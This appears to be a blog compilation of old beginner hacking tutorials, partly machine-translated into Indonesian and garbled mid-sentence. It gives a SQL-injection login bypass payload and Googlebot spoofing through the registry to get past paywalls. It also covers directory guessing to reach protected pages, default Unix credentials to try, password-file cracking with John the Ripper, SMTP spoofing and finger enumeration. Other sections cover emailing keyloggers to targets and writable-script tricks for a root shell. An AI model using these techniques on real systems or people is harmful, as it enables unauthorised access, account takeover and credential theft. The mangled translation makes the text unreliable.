9. Buka halaman target web Anda dengan mengklik ganda file yang eg.html 'yang telah Anda simpan.


10. U melihat bahwa beberapa perubahan pada halaman saat ini dibandingkan dengan Satu asli. Jangan khawatir.

11. Memberikan nama pengguna [misalnya: hacker] dan password [misalnya: 'or 1 = 1 -]


Congrats!! Anda telah berhasil memecahkan situs di atas dan masuk ke dalam rekening pengguna Ist disimpan dalam database server.


[Silakan baca "_form" = "bentuk" & "_type" = "tipe" & "_input" = "masukan" tanpa tanda kutip]

Trik di atas tidak akan bekerja pada situs menggunakan teknik terbaru untuk melindungi ada server. Tapi Anda bisa menemukan banyak situs!
Nikmati!


Rahasia Backdoor!

Banyak situs yang memaksa pengguna untuk mendaftar atau bahkan membayar untuk mencari dan menggunakan konten mereka, meninggalkan backdoor terbuka bagi Googlebot, karena kehadiran terkemuka di pencarian Google dikenal untuk menghasilkan lead penjualan, hits situs dan eksposur.
Contoh situs tersebut adalah Windows Magazine,. Majalah Bersih, Alam, dan banyak, banyak surat kabar di seluruh dunia.
Bagaimana kemudian, dapat Anda menyamarkan diri sebagai Googlebot? Cukup sederhana: dengan mengubah User Agent browser Anda. Salin segmen kode berikut dan paste ke dalam sebuah file notepad segar. Simpan sebagai Useragent.reg dan bergabung ke dalam registri Anda.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Internet Settings \ 5.0 \ User Agent]
@ = "Googlebot/2.1"
"Kompatibel" = "+ http://www.googlebot.com/bot.html"

Anda selesai!

Anda selalu dapat mengubahnya kembali lagi .... Saya tahu hanya satu situs yang menggunakan User Agent Anda untuk menetapkan eligability Anda untuk menggunakan layanannya, dan itulah situs Windows Update ...
Untuk mengembalikan IE6 User Agent, menyimpan kode berikut untuk NormalAgent.reg dan bergabung dengan registri Anda:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Internet Settings \ 5.0 \ User Agent]
@ = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


Sembunyikan IP anda menggunakan Proxy Server!

1. Pergi ke http://www.anonymouse.org

2. Ketik alamat website ada setelah memilih bahasa.
3. Kemudian tekan Enter.
4. Anda sekarang melihat situs web secara anonim.
5. Administrator Situs web tidak tahu Alamat IP Anda. Dia melihat Alamat IP dari beberapa bagian dari dunia.

Cara Kalahkan Situs Java Script Lindung!

Ada banyak cara untuk mengalahkan java-script website yang dilindungi. Beberapa sangat sederhana, seperti memukul [CTL-alt-del] ketika kotak password ditampilkan, untuk sekadar mematikan kemampuan java, yang akan dump Anda ke default page.You dapat mencoba mencari secara manual direktori lain, dengan mengetikkan nama direktori ke dalam kotak alamat url browser Anda, yaitu: Anda ingin akses ke target.
Coba mengetik target_com / gambar. (Hampir setiap situs web memiliki direktori gambar) Ini akan menempatkan Anda ke dalam direktori gambar, dan memberikan daftar teks semua gambar berlokasi di sana. Seringkali, judul gambar akan memberikan petunjuk kepada nama direktori lain.
yaitu: di www.target.com / gambar, ada gif bernama gamestitle.gif.. Ada kesempatan baik itu, bahwa ada direktori 'permainan' di situs, sehingga Anda kemudian akan ketik www.target.com / permainan, dan jika direktori isa valid, Anda lagi mendapatkan daftar teks dari semua file tersedia di sana.
Untuk pendekatan yang lebih otomatis, menggunakan program seperti WEB SNAKE dari anawave, atau Wacker Web. Program ini akan menciptakan citra cermin dari seluruh situs web, menampilkan semua direktur ies, atau bahkan cermin server yang lengkap. Mereka sangat diperlukan untuk mencari file tersembunyi dan directories.What yang Anda lakukan jika Anda tidak bisa melewati sebuah kotak pembukaan "PasswordRequired"? . Pertama apakah sebuah WHOIS Lookup untuk situs. Dalam contoh kita, www.target.com. Kami menemukan itu diselenggarakan oleh www.host.com di 100.100.100. 1.

Kami kemudian pergi ke 100.100.100.1, dan kemudian memulai Ular Web, dan mencerminkan seluruh server. Set Ular Web untuk TIDAK men-download sesuatu selama sekitar 20K. (Bukan halaman HTML banyak yang lebih besar dari ini) ini hal kecepatan beberapa, dan membuat Anda mendapatkan banyak file dan gambar yang tidak peduli. Hal ini dapat memakan waktu yang lama, jadi pertimbangkan berjalan dengan benar sebelum waktu tidur. Setelah Anda memiliki gambar dari seluruh server, Anda melihat melalui direktori yang tercantum, dan menemukan / target. Ketika kita membuka direktori tersebut, kita menemukan isinya, dan semua sub-direktori yang terdaftar. Katakanlah kita menemukan / target / permainan / zip / zipindex.html. Ini akan menjadi halaman indeks yang akan ditampilkan telah Anda pergi melalui prosedur password, dan memungkinkan untuk mengarahkan Anda here.By hanya mengetik di url target_index Anda akan halaman indeks onthe dan siap untuk mengikuti link untuk men-download.

Bahaya'' ctrl + c'' di web!

Hanya coba ini:
1) Salin teks dengan 'ctrl + c'
2) Klik Link: http://www.sourcecodesworld.com/special/clipboard.asp
Anda akan melihat teks yang disalin pada Layar yang diakses oleh halaman web ini. (Check it out!!)

Jangan menyimpan data sensitif (seperti password, nomor reditcard, PIN dll) dalam clipboard saat berselancar web. Hal ini sangat mudah untuk mengekstrak teks yang tersimpan dalam clipboard untuk mencuri informasi sensitif Anda.

Berhati-hati ...

Untuk menghindari Soal Clipboard Hack, lakukan hal berikut:
1. Di Internet Explorer, Klik Tools -> Internet options -> Keamanan
2. Tekan Custom level.
3. Pada pengaturan keamanan, pilih menonaktifkan bawah Biarkan pasta operasi melalui script dan klik 'OK. (Sekarang isi clipboard Anda aman.)

Hapus nama pengguna Disimpan dan Sandi!

Klik Start, Run dan ketik keymgr.dll Kontrol
Menghapus entri dari daftar.
Cara lain untuk mengakses dialog ini adalah:
Ketik control userpasswords2 di dalam kotak RUN, klik Advanced, Mengelola Sandi
-Atau-
Dari Control Panel, pilih User Account Anda, klik Kelola password jaringan Anda

Pengantar hacker!

Pengantar hacker
--------------------------

Ini adalah tutorial singkat yang dirancang untuk menunjukkan Anda bagaimana untuk memulai dengan
hacking. Ini bukan analisis mendalam dalam Unix dan saya tidak akan menunjukkan cara
to hack specific systems or give you any specific usernames or passwords.
Anything that you do after reading this file is NOT my responsibility, so
don't expect me to write to you in jail if you get caught. If you are an
advanced hacker, then I suggest you give this a miss as it's designed for
beginners...

Section 1 : What exactly is a hacker then?

Tricky one really. There are hundreds of definitions floating around, but
the basic description of a hacker would be someone who accesses and uses a
computer system in ways which a normal user might not think of. Hal ini mungkin
legal, but chances are that it will be illegal. Also, many hackers might not
consider you to be one of them unless you have the hacker attitude.
Basically what this means is that you have a certain view over the way in
which things should be done. For example, nearly all hackers are anti
authoritarian. Another thing which you really should do is give voluntry
help to other hackers. This may be in the form of debugging programs that
they have written, informing them of new bugs in systems etc... Ada
plenty of detailed FAQ's out there, so I won't go into it in detail. Mencoba
looking up 'hacker ethics' in any descent search engine (www.altavista.com
is pretty good) for more

Section 2 : Tell me how to hack!

Ya benar. You ask any hacker or newsgroup this and your gonna get flamed.
Flaming is when someone responds to your question by throwing a string of
anger and obsenities at you because they are mad. Mengapa mereka melakukan ini?
After all hacking is about giving voluntry help isn't it? Well, asking how
to hack is not only far too general, but it's also pointless. Nobody can
tell you how to hack. They can give you passwords, programs and bugs, but
they by doing this they would be stopping you from learning and discovering
new things, and let's face it, the best way to learn to hack is to do it.

Section 3 : Where to learn

Apart from actually hacking, the most important thing you can do is read.
Texts can come from a variety of sources, including your local library and
of coarse the internet. There are some around with titles like 'The secret
underworld of hacking' but these are mostly a waste of time, and contain no
valuable information. Instead, read books with titles like : 'Unix : An
introduction' or 'How to teach yourself Unix'. These will contain a wealth
of commands and information. You will not learn by simply downloading
programs to do your work for you, although some are essential (I'll tell you
which ones later).

Section 4 : The art of hacking

Hacking is in many ways an art. It takes time, patience and intelligence.
You won't get immediate gratification, but if you do get good, then it's
really worth it. There are several skills accosiated with hacking, but the
fundemental one, which is often overlooked by newbies is the ability to
program. Programming is basically telling the computer what to do, and a
programming language is the way in which you write it. Again, there are
millions of tutorials to do with this subject, and it is FAR too big to go
into here. The basic languages you will need to know are perl and c, which
are the main languages for the Unix operating system (I'll go onto that in a
second). Again, any good search engine will give you hundreds of sites
realted to these. Just to give you an idea of what programming is about,
here' some c source code (that's the text before it is compiled/interpreted
so the computer can understand it):

# Include
using namespace std;
int main()
{
cout<<'Hi there, how are you!';
}

Note that this section of code is taken from a MSDOS application. Unix will
differ slightly. Although it can be a bit tedious, programming is very
rewarding, and is very important if you want to become a good hacker. Anda
won't need to become some programming genius to hack though, just have a
general idea of the syntax used by the languages. The next important skill
you need to learn is how to use the Unix operating system. Ini adalah
operating system (like windows or DOS) which is specifically designed for
networking. Most big servers use it and it allows thousands of users to
connect to virtual (software) and hardware ports remotely ( if the computer
it is operating has them). Like programming, Unix is very complicated and
detailed, so I can only give you an introduction here. Cara terbaik untuk mengajar
you what Unix is is to give you an example. This example assumes that the
person using it has a shell account (a user name and password so that he can
log in and use the computers), and that the user has windows on their
komputer. It is entirely fictional:

(In the run bar)
telnet shinracorperation.com 23
(Telnet starts up, there's a brief pause before the cursor starts flashing)
SunOS : 5.10
login:rudolf
password:########

Welcome to the shinra corperations main server. Type 'help' for more.
$

That is an example of a typical Unix system. To operate it, we run telnet
(the standard telnet program included with windows), this will allow our
computer to communicate with the remote server which is
shinracorperation.com. The number 23 after it tells telnet to connect to
port 23 on the computer. Ports allow remote users to input commands to the
komputer. A computer can have thousands of ports, each with a different
number, but the most common and what they do are:

13 : Date and time port (pretty useless really)
21 : FTP (File transport Protocal) port
23 : Standard telnet port. This is the port which the telnet program will
try to open by default
25 : Send Mail port. This allows the user to operate an ancient send mail
program which can send messages to email addresses on that server (more
later)
79 : The 'finger' port. This allows the user to type in the name of a user
and get details on them (very useful)
80 : Standard http port (it's the one your browser opens)
110 : POP port. Allows you to operate a primitive POP email program.

To connect to each of these ports you would put the number instead of 23 in
baris perintah. The next line tells us what type of operating system the
computer is using. This will become important if you need to use a bug or
back door to get into the system, as they vary from operating system to
operating system. One advantage of Unix operating systems is that they don't
record your login attemps, so the sysadmin won't find 6000 attempts in his
log file when he has a look. Now, the only thing holding us back here is the
need for a username and password. In the early days of hacking, you could
telnet to any computer, type in root as your username and root as your
password and you'd be in with superuser privialges (root is the username
that should give you the ability to do anything on that computer). Bahwa
ain't gonna happen these days. There are some servers which you might be
lucky enough to guess a username and password on, so have a look at the list
below of common Unix users:

akar
admin
adm
sysadmin
guest (VERY often the password will be guest too)
uji
demo
uucp

Although unlikely, these may work if you enter the password the same as the
username, it's worth a try. I hope that gave you an idea of what Unix is.
The final part, by the way, was the command prompt, similair to the C:\>
prompt in DOS. Here you would enter commands for the computer. Since this is
only an introduction, I won't go into commands here, but there are plenty of
books, many from your local library which will tell you how to use Unix. Anda
can find more information on how to exploit bugs in Unix operating systems
and backdoors in them by using a search engine. Chances are that you will
not be able to guess the password. In this case you'll need to do some
penelitian. Try looking at the companies web site, and finding out things
tentang mereka.

Section 5 : Toolz

Although you should use them as little as possible, you will need to use
some programs. One of the most essential is a password cracking program. Di
most Unix systems, the password file is located in /etc/passwd. As I've
said, there are plenty of files which will tell you how to download it, so I
won't go into that here. Now, assuming you've got the password file, you'll
need a program called John the Ripper deencrypt the file and get the
passwords. If you open the passwd file with a standard editor like notepad
or edit, you will see something like:

root:h589798Hhgh:0:0:/etc

atau

root:x:0:0:/etc

With many more lines added on. If it looks like the first one, then not only
are you lucky, but you've got the passwords for the entire system. Sekarang jalankan
Jack the ripper on it, and if your dictionary file (a file with lots of
standard passwords in it) is good enough, you should at least get a few of
the passwords. If you get root, then get very, very excited. You can now log
into the system and do anything. BUT be warned, you do ANY damage what so
ever, and they'll find you within a couple of hours, so DON'T. Tidak hanya
that, but it'll make you a cracker which is someone who breaks into a system
to do damage to it, they are looked down upon by real hackers. Now, if it
looks more like the second one, get ready to cry 'cos the password file is
shadowed. This means that although the users are stored in the passwd file,
the passwords are stored in different one, usually /etc/shadow. Ini
obviously means that you must download the shadow file (the server probably
won't let you), merge it with the passswd file, and then run john the ripper
on it. If you can get both the passwd and shadow files, you'll need to get a
program called VCU to merge them, although there are some others around.
Shadowing is used by most servers these days, and makes life a hell of a lot
more difficult

Section 6 : Using programs on the server

The first program I'm gonna look at is SMTP (send mail) which is usually
stored on port 25. I'm not gonna give any direct examples here, but replace
the xxx part with virtually any server name and you should find one:

telnet xxx 25

SMPT Version 1.3 Ready

And that is all you get. You are now ready to run this program. It allows
you to send mail to anyone who has an email address within that server. Itu
commands that you'll need to know to use this program are

help - gives you a list of commands. If you follow it with a command, it
will give you help on it

helo - This tells the computer who you are

mail from:xxx - It will say who the mail is from on the message (replace xx
with a made up or real email address)

rcpt to: - Who the mail will go to. It must be within the server that you
are hacking or you will get the error 'Relaying not allowed'

data : Press enter, and type in what you want the message to say. Put a full
stop (a period) and a seperate line and press enter to end and send the
pesan

quit : Disconnects you

vrfy xxx : Replace the xxx with a user name, and it will tell you if it
ada

This should give you a basic idea of how to use the program. The commands
should come in that order to send mail (vrfy is not needed to send mail, you
can simply use it to tell if a user exists. Oh yeah, and you won't see what
you type in.

The other program I'm gonna look at is in port 79 so type:

telnet xxx 79

You will be greeted by, well nothing. Loads of servers have closed this
port, but if they have it open, then it is very useful. All you do is type
in the name of the user you want to finger, and it will give you their
account details. Try all of the common users above. This program will
usually only let you finger one user before disconnecting.

Kesimpulan

I hope this has been an informative introduction into the world of hacking.
Even at this level, there are tonnes more things which you will need to find
out about so that you can hack. I suggest you look the following things up
in your search engine:

Unix operatins system
keamanan komputer
hack
c pemrograman
perl programming
hacking tutorials

Hopefully you will find what you need. One last word of warning, be VERY
careful about hacking, and don't do any damage, you WILL get caught if you
melakukan. Oh yeah, and have fun...

Legal Stuff...

You may reproduce this document on any web page or on any CDROM or
sebaliknya. You do not have to ask my permission or anything, as long as it
remains unchanged and I get the credit. As I've already said, I'm not
responsible if you act on the information above, and this was intended for
EDUCATIONAL PURPOSES ONLY.


Metode Tentu Cracking Setiap e-mail Sandi!

One of the most successful method is achieved with the used of keyloggers and spy software. There are lots of spyware, logging tools available today such as 007, RemoteSpy, Netvizor, Email Spy, Chat Spy, Spector Pro, eBlaster, Invisible Keylogger, to name a few . This software will create a self extracting or installation file, you can then run it in the computer for surveillance, or email it to your target. The only question is, how can you convinced the recipient to open it?

Most hackers does not really hacking passwords by penetrating Yahoo, Hotmail, Gmail, and AOL servers, instead they will go for the easy way - the end user, that's you. It's not what you see on the movies such like "Hackers," "SwordFish," and so on. Too good to be true! They don't actually hack, but logs every stroke on your keyboard including the passwords you have input.

Keep in mind that computer surveillance Programs should be used only if necessary, it was not created to invade someone's privacy. If you are going to use it, be a responsible user.

Thursday, November 15, 2007

Cara Hack (Tips Dasar Untuk Mulai Hacking)!

How to Hack?

what they do to Hack?
These are the common enough question, asked on nearly every hacking board across the web, and yet, no one seems to be able to answer it.
One reason for this is the fact that the vast majority of people who really don't have, want, or need a clue. Then there's a small minority who have a good basic knowledge but simply not enough conviction to teach. Then there's the tiny minority who really know the ins and outs of computer systems, they can program exploits, bug fixes, and can generally fix, or find out how to fix nearly any problem. These are the people referred to as computer experts. An even smaller percentage of people again are called hackers. Hacker is a term that over recent time has been changed and exploited by the media to mean someone who breaks into and destroys a computer system. I don't like these people. These are the people who give true hackers a bad name. By dictionary definition, a hacker is someone who has an extraordinary ability to push a computer system, or program, to work beyond expected boundaries, "He hacked away at the program all night until he got it to work " . A Hacker, in the true meaning should be respected, the modern interpretation, someone who breaks systems is traditionally known as a cracker

The biggest reason for someone to truly want to become a hacker is to learn. There's no bigger reason than this. The simple craving to learn about, change, understand and improve a computer system and/or program is the single biggest goal for any hacker. Maybe the second biggest reason behind hacking is freedom. To understand this you must fist understand what I talked about in the previous paragraph, that hacking is not breaking systems, but improving them. Any one who considers themselves half knowledgeable about the Internet should have heard of Gnu/Linux. If you haven't please refer to http://www.linux.org/info/index.html. Linux and the GNU project embody the spirit of what I consider to be a true hacker goal. The ideas of freedom, improvement and development should be at the heart of every hacker's life. The Internet itself is another representation of this ideal. There is no one owner of the Internet; anyone can access it for no costs other than that of a phone call. The Internet is the single biggest source of information the world has ever seen. It contains information on billions of subjects, the vast majority of which is absolutely free. A person with a connection to the Internet can access information on everything from quantum computing to the exploration of mars, from pro-anarchy to pro-capitalist. It allows all this information to be accessible to everyone with no discrimination on the basis of age, colour, religious or political orientation. That's enough of a rant on freedom now. I'm sure most people are reading this to find out what it takes to become a hacker.

A hacker, as I have previously explained, is a person who has a craving for knowledge. If you don't have the will to learn continuously, spend countless hours reading, researching and improving then hacking defiantly isn't for you. Many people will give up after a few months, many I'm sure didn't even make it to this far into the document, if you did then well done, keep reading, in time, you will learn to truly enjoy hacking away at your own programs and helping others too. I am by no means a hacker; neither do I claim to be. However, I have been reading, learning and sometimes even contributing for quite a while now, and hopefully this document will allow you to do the same. Cukup bicara. This is where you start to learn.

As by now you will know, the main aim of hacking is knowledge. Before you can even hope to understand how to improve software you must fist understand how the current software works. Since most newbies (Newbie n. Someone who has little knowledge or experience with computer systems and/or programs) I assuming will be using a version of the Windows OS (OS - Operating System) Since you wish to learn how to hack I am assuming you have quite a strong grasp of the basics or Windows such as how to run programs, navigate your hard disk, install new software, hardware etc. If you do not know how to do this use the built in help function by clicking Start -> Help, or use your favourite search engine, I suggest google.com as it's probably the largest in the world. Learn how to use everything about your OS, including MS-DOS. To open a MS-DOS prompt, or shell Click on Start -> Programs -> MS-DOS Prompt , if this fails or the link isn't there for some unknown reason click Start -> Run and then type 'command.com'. This will run the program command.com, which is located in the c:\ directory of your hard disk. There are various programs that can be run from the dos prompt, which are very useful in basic hacking techniques.


Intro to MS-DOS

MS-DOS is a command line OS which is the basis for most windows OS's. It has many internal commands such as copy, cd, cls, ren, del. And several external commands including sys, move, format, deltree, syscopy. Internal commands are commands which are built into the command.com program and so can be run in any MS-DOS with no dependencies, External commands are commands which are not built into command.com, they are external programs which are usually found in c:\windows\command but can be found anywhere. In DOS, to find out what a command does you can type 'command /?' at a dos prompt where command is the name of the command you wish to learn about. This is invaluable and if you ever need to find out what a command does, this is the first thing you should try. Next I am going to explain some basic MS-DOS commands which will be useful during your exploration of the web.


ping

Usage: ping [-options] hostname.domain

Output:


Pinging yahoo.com [66.218.71.112] with 32 bytes of data:
Reply from 66.218.71.112: bytes=32 time=306ms TTL=45
Reply from 66.218.71.112: bytes=32 time=430ms TTL=45
Reply from 66.218.71.112: bytes=32 time=295ms TTL=45
Reply from 66.218.71.112: bytes=32 time=340ms TTL=45
Ping statistics for 66.218.71.112:
Paket: Terkirim = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 295ms, Maximum = 430ms, Average = 342ms

Ping sends a ping request to a domain name to test its reactivity and response times. It does this by sending a packet of information to the server in question and requests a response. The output, as you can see is tells you the domain name that is being pinged, its IP address, the size of packets sent out, the response times, and averages. Ping is a very useful command as it tells you the IP address of a domain name, and tells you if it is 'alive' and responsive. The uses of this will become apparent later on. To find out extra options that can be used with ping, type 'ping /?' at the dos prompt.


netstat

Usage: netstat [-options]

Output:


Aktif Koneksi
Proto Local Address Foreign Address State
TCP pbn-computer:1067 w3.dcx.yahoo.com:80 ESTABLISHED
TCP pbn-computer:1069 209.73.225.7:80 ESTABLISHED
TCP pbn-computer:1070 212.187.244.14:80 ESTABLISHED
TCP pbn-computer:1071 212.187.244.14:80 ESTABLISHED

Netstat gives a list of all connections coming to and from your computer. It displays the ports (A virtual port of a computer is like an imaginary route for information to come in and out of your computer (to the internet) All services and programs which use the internet use a different port to ensure that information does not get sent to the wrong program) and IP's of both ends of the connections. There are thousands of available ports, not something you run out of. Once again, typing 'traceroute /?' at the dos prompt to get more information. Netstat can also be used as a crude method of getting a person's IP. To do this you do the following, for the sake of simplicity you should try to minimise the number of connections, this can be done by closing internet browsers, chat programs etc. Firstly, you will need to talk to the person on a chat program such as msn messenger, aim, yahoo messenger or something similar. At the dos prompt type 'netstat > temp1.txt' this will give the standard output, but the output will be routed into the file temp.txt (which if does not exist, will be created, and if does exist will be over written). Next you will need to establish a direct connection with the target computer, this can be done by initiating a file transfer. Whilst the file transfer is talking place you will need to once again type 'netstat >temp2.txt'. The next task is to compare the two files (temp1.txt and temp2.txt), the second file should contain an IP address that is not in the first, this new connection is the connection you initiated o the target computer, hence the IP address is the IP of your target.


tracert

Usage: tracert [-options] IP

Output:


Tracing route to yahoo.com [66.218.71.113]
over a maximum of 30 hops:
1 * * * Request timed out.
2 175 ms 180 ms 180 ms cdf-dam1-a-fa11.inet.ntl.com [62.252.33.201]
3 185 ms 200 ms 200 ms 62.254.253.17
4 180 ms 170 ms 190 ms bir-bb-a-so-220-0.inet.ntl.com [213.105.172.45]
5 165 ms 180 ms 180 ms bir-bb-b-ge-720-0.inet.ntl.com [62.253.185.154]
6 320 ms 360 ms 320 ms yahoo-above-1.pao1.above.net [64.125.31.230]
7 400 ms 340 ms 339 ms ge-1-3-0.msr2.pao.yahoo.com [216.115.100.146]
8 315 ms 355 ms 345 ms vl11.bas2.scd.yahoo.com [66.218.64.138]
9 420 ms 320 ms 340 ms yahoo.com [66.218.71.113]
Melacak lengkap.

Tracert short for trace route does exactly that, it traces the route taken by individual packets of information as they are transmitted across the Internet to the destination. The uses of this are numerous and will become clear as you learn more. In its simplest form it can be crudely used to find out a persons ISP and even locate them on a international level. For example, is you tracert a persons ISP, and the final hop before reaching them is m284-mp1-cvx1c.car.ntl.com [62.252.45.28] , we know that the person uses ntl as an ISP, on further investigation it can be found that ntl is a UK based ISP and the abbreviation .car. stands for Cardiff, a city in the UK. From this we know that the person in question uses ntl and lives in the vicinity of Cardiff. Encase any one out their is wondering, I do live in Cardiff, UK and the IP address is mine, its a dynamic IP address (dynamic means it changes every time I connect to the internet as oppose to static which means the connection is constant and IP does not change). Use 'tracert /?' Untuk informasi lebih lanjut.

Ok, so they are three basic, and surprisingly simple yet useful commands to give you a basic understanding of DOS. If you want to learn more then I suggest you search the internet, http://www.google.com is, as far as I know, the biggest search engine on the web and along with the most simple of knowledge should allow you to find anything about anything.

The next step in your journey towards hackerdom is a programming language. Many people wonder why they should 'waste their time' learning a language to help them hack when they could just as easily download a trojan or other script kiddie (A 'script kiddie' is someone who uses other peoples programs to crack without the knowledge of how they work) tool to break into someone's computer. If you search the web I'm sure you can very easily find programs and viruses that let you take control of peoples computers, delete their programs and cause havoc. This is not hacking. Trojans, getting their name from the Greek trojan horse, require a program to be run on the target computer to allow you access. This will probably work on your friends who don't have virus scanners (as virus scanners will very easily pick up viruses) but if you set your sights on a computer owned by anyone with more than half a brain trojans simply are not effective. Again, to refer back to the original definition of hacking, it is about learning how systems work, how to improve them, not simply to break in and gain control. It is for this reason that in order to hack effectively you _must_ learn a programming language.

Their are many different languages out there to learn, they fall into two categories. There are interpreted languages, such as perl, python, bash scripting and even batch scripting (feel free to do a search on any of these to learn more about them). These languages are text files that contain commands that are interpreted by a program and then executed by the computer. They have the advantage of being quick to write and edit but the major advantage is that they can be run on any machine which supports the interpreter of that language but on the downside they run much slower than compiled languages and are generally less powerful. Compiled languages on the other hand create binary files, which do not require an interpreter. They are created when the language is written in a readable text file and then compiled by a compiler. This changes it into a binary file which understandable to humans. To change them you must edit the source code file and recompile them. They have the advantage of being much faster and they allow you to perform much more complex operations. However on the downside they take longer to edit and are OS specific. Examples of compiled languages are C and C++. It is advisable to learn at least one of each of the types of language as this will give you the advantages of both types of language. I suggest that you do some basic reading (again using a search engine) on all the languages I have mentioned. On a personal note, I would suggest that you learn perl, due to its power and simplicity as well as cross-platform compatibility and C, because it is as close as you will get to an Internet standard and is used by most open source programmers.

This brings me on to my next topic. Operating systems. As you immerse yourself into the world of hacking I'm sure you will hear everyone shouting at you to run gnu/Linux instead of windows. I'm also sure that most of you will have no idea why. First, a little history. The GNU project was started in 1984 with the aim of developing a completely free and open source operating system. In 1990 Linus Torvalds finished writing a Unix based open source kernel. An operating system is basically a lot of programs grouped together to run computer hardware the kernel is the software that interfaces directly with the hardware, and the other software interfaces with the kernel. In short, an operating system cannot exist with out both software and a kernel. By the time that Linus Torvalds finished writing his kernel, the Gnu project has just about finished writing their OS, all they were short of was a kernel. Waktu itu sempurna. Linus and the GNU project teamed up to release the operating system which is commonly called Linux, but should be more accurately know as GNU/Linux. Since that time, Linus has continued developing his kernel and the GNU project has continued developing their software. Since then variations of the GNU/Linux system have developed called distributions. Each distribution is configured differently with slightly different software, each designed for different reasons. Examples of commonly used distributions are SuSe, RedHat, debian and slackware (each have .com sites). Linux is considered _the_ operating system for various reasons, not least of which is its freedom. The GNU/Linux operating system was, and is being, developed under the GNU public licence. This licence is intended to keep software free, under it you are able to change, sell or give away the software for any charge as long as you supply the source code along with it as so to enable other people to have the same rights as you have. Another benefit of the freedom of GNU/Linux is its stability, the fact that the source code is available to anyone means that anyone is free to add to it, change it, modify it. This means that if someone finds a bug they can find it, write a patch and submit it to the author who may include it in his next update. Due to its fundamental Unix like design, Linux is very virus resistant, its user based system it is hard for viruses to spread. Once again, if an exploit is found in and GNU/Linux software you can almost guarantee that a patch will be written within a few days, if not the same day, this means if security is a concern, you can keep your box wrapped up tight.

GNU/Linux also has many features built in which make it very good as a development platform. It has built in compilers for C and C++, most distributions also contain perl and python interpreters. Its openness also means that you can customise your distribution much more effectively than with windows, optimising it for speed, stability or security. This is the reason why most hackers or computer enthusiasts use Gnu/Linux. I'm not going to include a guide to how to use Linux, simply because their are so many out there do a search on google.com. However, since I'm feeling nice today I will point you in the direction of my favourite reference http://www.slackware.com/book/, it is supposed to be specific to Slackware Linux, but what it teaches is quite general and will work on any Linux system.

As well as all of the above, you should also continuously be reading and learning about current exploits and 'tricks' on both windows and Unix based operating systems. There is no end of information out there for those willing to search. To become a hacker you must want to learn about and more importantly understand everything you come into contact with. If there is a new concept you come into contact with, learn about it, search for it on google.com and if all else fails, ask.

Most hacks aim to gain root access, as you will now know from your experience of Linux systems, root is a super user that can do anything on the system. There are five common ways of getting root.


Misconfiguration

If excessive permission exists on certain directories and files, these can lead to gaining higher levels of access. For example, if /dev/kmem is writable it is possible to rewrite your UID to match root's. Another example would be if a .rhosts file has read/write permissions allowing anyone to write them. Yet another example would be a script launched at startup, cron, or respawned. If this script is editable, you could add commands to run with the same privileges as who started them (particularly for startup rc files this would be as root).


Poor SUID

Sometimes you will find scripts (shell or Perl) that perform certain tasks and run as root. If the scripts are writable by your id, you can edit it and run it. For example I once found a shutdown script world writable. By adding a few lines at the beginning of the script it was possible to have the script create a root shell in /tmp.


Ras Kondisi

A Race Condition is when a program creates a short opportunity for evil by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration. If the permissions on that temporary file allow it to be edited, it might be possible to alter it before the program finishes its editing process.


Poor Temp Files

Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temp files and what permissions these temp files have, it might be possible to use links to create root-owned files.


Buffer Overflow

Buffer overflows are typically used to spawn root shells from a process running as root. A buffer overflow could occur when a program has a buffer for user-defined data and the user-defined data's length is not checked before the program acts upon it.

Four out of the five ways of getting root mentioned above are only applicable on a machine where you have local access. In these cases you will need to get an account on the machine. This could be in a school or collage that you attend, or simply an internet shell account. Since this text is only meant to be an introduction and outline guide I will not go into huge details about these. There is plenty of information on the web, once again I suggest you use google.com, I can't stress enough how useful a search engine is in the world of hacking.

By far the most common way to gain a root shell is through a buffer overflow. It is also unsurprisingly the most complicated of the about ways of getting root and deserves a bit more explanation. Firstly, a buffer is simply a block of computer memory, which holds data of a certain type. If, as I suggested, you have learnt, or are learning, how to program in C, you will probably associate buffers with arrays. A stack has a set amount of space in memory, if you overflow the buffer by sending too much information, the extra data overflows onto the next stack and can be used to execute arbitrary code. For a much better explanation of buffer overflow techniques I suggest you read Phrack 49, File 14, called "Smashing The Stack For Fun And Profit" which can be found at http://www.phrack.com/phrack/49/P49-14 .

Well, it looks like this guide has come to an end. There is only one thing that I have left to say. If you follow all the instructions I have mentioned above, you will have a very good understanding of how the Internet, Ms-dos, Windows, Linux and various hacking techniques work, You may even be considered by some to be a Hacker. If you do end up in this situation, the world is yours, continue to learn, expand and enjoy..

==========================================================================

Widgeo